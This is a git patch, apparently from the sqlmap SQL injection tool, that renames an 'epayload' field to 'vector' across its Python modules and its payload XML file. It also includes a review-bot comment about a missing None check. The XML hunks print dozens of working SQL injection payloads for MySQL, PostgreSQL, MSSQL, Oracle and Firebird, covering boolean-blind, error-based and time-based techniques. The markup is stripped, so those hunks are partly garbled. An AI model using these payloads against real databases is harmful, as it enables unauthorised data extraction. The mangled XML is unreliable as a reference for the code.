From 11058667e440c30b31e7f609e0296b18ea8b97d6 Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Fri, 3 Dec 2010 14:45:13 +0000
Subject: [PATCH] Better naming
---
 lib/controller/checks.py | 8 ++--
 lib/request/inject.py | 4 +-
 lib/techniques/error/use.py | 4 +-
 xml/payloads.xml | 86 +++++++++++++++++++------------------
 4 files changed, 52 insertions(+), 50 deletions(-)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index f82ab0583..3579344fc 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -363,17 +363,17 @@ def checkSqlInjection(place, parameter, value):
 injection.suffix = suffix
 injection.clause = clause
- if "epayload" in test and test.epayload is not None:
- epayload = "%s%s" % (test.epayload, comment)
+ if "vector" in test and test.vector is not None:
+ vector = "%s%s" % (test.vector, comment)
 else:
- epayload = None
+ vector = None
 # Feed with test details every time a test is successful
 injection.data[stype] = advancedDict()
 injection.data[stype].title = title
 injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload, False)
 injection.data[stype].where = where
- injection.data[stype].epayload = epayload
+ injection.data[stype].vector = vector
 injection.data[stype].comment = comment
 if "details" in test:
diff --git a/lib/request/inject.py b/lib/request/inject.py
index eac83bb39..c9413de9c 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -98,8 +98,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
 parameter through a bisection algorithm.
 """
- if kb.injection.data[1].epayload is not None:
- vector = agent.cleanupPayload(kb.injection.data[1].epayload)
+ if kb.injection.data[1].vector is not None:
+ vector = agent.cleanupPayload(kb.injection.data[1].vector)
 else:
 vector = queries[kb.misc.testedDbms].inference.query
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 9747cc84c..e74f625d5 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -34,8 +34,8 @@ def errorUse(expression):
 """
 output = None
- query = agent.cleanupPayload(kb.injection.data[2].epayload)
- query = unescaper.unescape(query)
+ vector = agent.cleanupPayload(kb.injection.data[2].vector)
+ query = unescaper.unescape(vector)
 query = agent.prefixQuery(query)
 query = agent.suffixQuery(query)
 check = "%s(?P.*?)%s" % (kb.misc.start, kb.misc.stop)
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 7712b4d64..1d6b880dc 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -126,7 +126,7 @@ Tag: original value to its negative representation 3: Replace the parameter original value - Sub-tag: + Sub-tag: The payload that will be used to exploit the injection point. Sub-tag:
@@ -190,7 +190,7 @@ Formats: - +
@@ -395,6 +395,7 @@ Formats: +
@@ -605,7 +607,7 @@ Formats: 1 1 1 - + AND [RANDNUM]=[RANDNUM]
@@ -621,7 +623,7 @@ Formats: 3 1 1 - + OR [RANDNUM]=[RANDNUM]
@@ -640,7 +642,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
@@ -660,7 +662,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
@@ -679,7 +681,7 @@ Formats: 1 3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
@@ -698,7 +700,7 @@ Formats: 1 3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
@@ -711,7 +713,7 @@ Formats: - + Generic boolean-based blind - GROUP BY and ORDER BY clauses (append) 1
@@ -719,7 +721,7 @@ Formats: 1 2,3 1 - + , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))
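Review bot: In the errorUse hunk the new line `vector = agent.cleanupPayload(kb.injection.data[2].vector)` reads `.vector` with no `is not None` guard, whereas the sibling inject.py hunk in this same commit checks `kb.injection.data[1].vector is not None` before calling cleanupPayload, and checks.py stores `vector = None` for any test that carries no vector. If an error-based entry without a vector ever reaches this path, cleanupPayload is handed None instead of a query string, which is a crash rather than a clean "technique unavailable" result. Mirroring the inject.py shape, e.g. `if kb.injection.data[2].vector is None: return output` placed before the cleanup call, would keep the two techniques consistent; the body of errorUse continues outside the hunk, so confirm that early-return value matches what the function returns on its other no-result paths.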
@@ -735,7 +737,7 @@ Formats: 1 2,3 3 - (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) + (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) @@ -755,7 +757,7 @@ Formats: 1 2,3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) @@ -774,7 +776,7 @@ Formats: 1 3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) @@ -793,7 +795,7 @@ Formats: 1 3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) @@ -806,7 +808,7 @@ Formats: - + Generic boolean-based blind - GROUP BY and ORDER BY clauses (replace) 1 @@ -814,7 +816,7 @@ Formats: 1 2,3 3 - + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) @@ -833,7 +835,7 @@ Formats: 0 1 1 - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) 
@@ -853,7 +855,7 @@ Formats: 0 1 1 - AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) + AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -872,7 +874,7 @@ Formats: 0 1 1 - AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) + AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -891,7 +893,7 @@ Formats: 0 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -910,7 +912,7 @@ Formats: 0 1 1 - AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + AND [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') 
@@ -929,7 +931,7 @@ Formats: 2 1 1 - OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -949,7 +951,7 @@ Formats: 2 1 1 - OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) + OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) @@ -968,7 +970,7 @@ Formats: 2 1 1 - OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) + OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -987,7 +989,7 @@ Formats: 2 1 1 - OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) 
@@ -1006,7 +1008,7 @@ Formats: 2 1 1 - OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') + OR [RANDNUM]=('[DELIMITER_START]'||%s||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') @@ -1032,7 +1034,7 @@ Formats: 0 2,3 1 - , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -1052,7 +1054,7 @@ Formats: 0 2,3 1 - , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) @@ -1071,7 +1073,7 @@ Formats: 0 3 1 - , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) 
@@ -1090,7 +1092,7 @@ Formats: 0 3 1 - , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -1109,7 +1111,7 @@ Formats: 0 2,3 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) @@ -1129,7 +1131,7 @@ Formats: 0 2,3 3 - (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) @@ -1148,7 +1150,7 @@ Formats: 0 3 3 - (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) + (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) 
@@ -1167,7 +1169,7 @@ Formats: 0 3 3 - (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) @@ -1419,7 +1421,7 @@ Formats: 1 1,2,3 1 - AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) + AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) AND SLEEP([SLEEPTIME]) @@ -1439,7 +1441,7 @@ Formats: 1 1,2,3 1 - AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) + AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) AND BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1458,7 +1460,7 @@ Formats: 1 1 1 - + AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000)))) @@ -1478,7 +1480,7 @@ Formats: 1 1 1 - + AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0 @@ -1506,7 +1508,7 @@ Formats: 3 1,2,3 1 - OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) + OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME])) OR SLEEP([SLEEPTIME]) @@ -1526,7 +1528,7 @@ Formats: 3 1,2,3 1 - OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) + OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) OR BENCHMARK(5000000, MD5('[SLEEPTIME]')) @@ -1545,7 +1547,7 @@ Formats: 3 1 1 - + OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000)))) @@ -1565,7 +1567,7 @@ Formats: 3 1 2 - + OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0